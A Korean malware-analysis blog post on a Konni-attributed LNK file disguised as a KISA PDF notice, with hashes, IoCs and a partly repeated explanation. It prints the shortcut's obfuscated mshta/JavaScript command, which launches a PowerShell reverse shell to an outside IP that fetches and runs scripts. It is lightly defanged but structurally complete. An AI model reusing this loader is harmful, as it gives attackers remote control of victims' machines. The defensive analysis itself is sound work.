북한 Konni(코니) 에서 만든 한국인터넷진흥원 사칭 악성코드-KISA 알림.pdf.lnk(2025.5.8)
Contents
오늘도 우리의 주적인 북한의 정찰총국 산하의 해킹 단체인 Konni(코니)에서 만든 악성코드인 KISA 알림.pdf.lnk 애 대해 알아보겠습니다.
파일명:KISA 알림.pdf.lnk
사이즈:1 MB
MD5:676ddf398f9afbbc583057904579de21
SHA-1:cf9d55508350adeee30606ebb3c31ad66ae15992
SHA-256:7d997e913766c9b9d163405ce4572bae462020982f1243f9107597d73d565101
이며 일단 해당 악성코드는 mshta 부분 악용을 해서 해당 악성코드를 실행합니다.
아마도 SK 텔레콤(SKT)의 해킹 사태 때문에 한국인터넷진흥원(KISA)을 사칭해서 개인정보를 탈취를 시도하는 것이 아닌가 생각이 됩니다.
악성코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: not present
commandlinearguments: javas(c)ript:t="$w=New-Object Sy"+"stem.IO.Stream";g="=
'c:\\programdata\\";s="a=new Ac"+"tiveXObject('WScrip"(+)"t.Shell');a.Run(c,0,true);close();
";c="pow"(+)"ershell -ep bypass -c $g='b56(1)4';$o"+g(+)"'+$g;sc $o 0;whi"(+)"le($true)
{$a=New-Object Syst"+"em(.)Net.Soc"(+)"kets.TcpClien"+"t"+"('64(.)20(.)59(.)148'(,)7711);
$s=$a.GetSt"(+)"ream();"(+)t(+)"Writer($s);$w.Au(t)oFlush=$true;$z='123'(+)$g;$w.WriteLin
e($z);"+t(+)"Reader($s);$c=$w.Rea"(+)"dLine();$q"(+)g+"k(.)ps1';sc $q $c;.$q;del $q;$s.cl
ose();Sleep(20);}";eval(s);
iconlocation: .pdf
}
local_base_path: C:\Windows\System32\mshta(.)exe
악성코드 분석
mshta.exe 를 악용해서 PowerShell 기반 리버스 셸을 실행하는 악성코드
해당 악성코드는 pdf 아이콘으로 인 것으로 보이지만 사실은 바로 가기 아이콘이며 실행 파일을 통해 사용자 클릭을 하게 해서 mshta.exe 를 악용을 하는 코드입니다.
자바스크립트 코드 내부의 eval()을 통해 PowerShell 코드를 실행하는 구조로 되어 있으며 분석을 어렵게 만들고 Windows의 기본 시스템 도구를 활용하는 방식을 취하고 있습니다.
ActiveXObject를 통해 WScript(.)Shell 객체를 생성하고 a(.)Run(c(,)0,true) 로 조합된 PowerShell 명령을 호출
최종적으로 실행되는 PowerShell 라인별 코드
$g =b5614
감염된 시스템을 식별하기 위한 고유 토큰 이후 서버 통신 시 클라이언트 식별자로 활용
$o = 'c:\pr(o)gramdata\b5614: 악성코드가 실행 중 상태 기록이나 감염 여부 …
파일명:KISA 알림.pdf.lnk
사이즈:1 MB
MD5:676ddf398f9afbbc583057904579de21
SHA-1:cf9d55508350adeee30606ebb3c31ad66ae15992
SHA-256:7d997e913766c9b9d163405ce4572bae462020982f1243f9107597d73d565101
이며 일단 해당 악성코드는 mshta 부분 악용을 해서 해당 악성코드를 실행합니다.
아마도 SK 텔레콤(SKT)의 해킹 사태 때문에 한국인터넷진흥원(KISA)을 사칭해서 개인정보를 탈취를 시도하는 것이 아닌가 생각이 됩니다.
악성코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: not present
commandlinearguments: javas(c)ript:t="$w=New-Object Sy"+"stem.IO.Stream";g="=
'c:\\programdata\\";s="a=new Ac"+"tiveXObject('WScrip"(+)"t.Shell');a.Run(c,0,true);close();
";c="pow"(+)"ershell -ep bypass -c $g='b56(1)4';$o"+g(+)"'+$g;sc $o 0;whi"(+)"le($true)
{$a=New-Object Syst"+"em(.)Net.Soc"(+)"kets.TcpClien"+"t"+"('64(.)20(.)59(.)148'(,)7711);
$s=$a.GetSt"(+)"ream();"(+)t(+)"Writer($s);$w.Au(t)oFlush=$true;$z='123'(+)$g;$w.WriteLin
e($z);"+t(+)"Reader($s);$c=$w.Rea"(+)"dLine();$q"(+)g+"k(.)ps1';sc $q $c;.$q;del $q;$s.cl
ose();Sleep(20);}";eval(s);
iconlocation: .pdf
}
local_base_path: C:\Windows\System32\mshta(.)exe
악성코드 분석
mshta.exe 를 악용해서 PowerShell 기반 리버스 셸을 실행하는 악성코드
해당 악성코드는 pdf 아이콘으로 인 것으로 보이지만 사실은 바로 가기 아이콘이며 실행 파일을 통해 사용자 클릭을 하게 해서 mshta.exe 를 악용을 하는 코드입니다.
자바스크립트 코드 내부의 eval()을 통해 PowerShell 코드를 실행하는 구조로 되어 있으며 분석을 어렵게 만들고 Windows의 기본 시스템 도구를 활용하는 방식을 취하고 있습니다.
ActiveXObject를 통해 WScript(.)Shell 객체를 생성하고 a(.)Run(c(,)0,true) 로 조합된 PowerShell 명령을 호출
최종적으로 실행되는 PowerShell 라인별 코드
$g =b5614
감염된 시스템을 식별하기 위한 고유 토큰 이후 서버 통신 시 클라이언트 식별자로 활용
$o = 'c:\pr(o)gramdata\b5614: 악성코드가 실행 중 상태 기록이나 감염 여부 …
IoC
64.20.59.148
7d997e913766c9b9d163405ce4572bae462020982f1243f9107597d73d565101
cf9d55508350adeee30606ebb3c31ad66ae15992
676ddf398f9afbbc583057904579de21
7d997e913766c9b9d163405ce4572bae462020982f1243f9107597d73d565101
cf9d55508350adeee30606ebb3c31ad66ae15992
676ddf398f9afbbc583057904579de21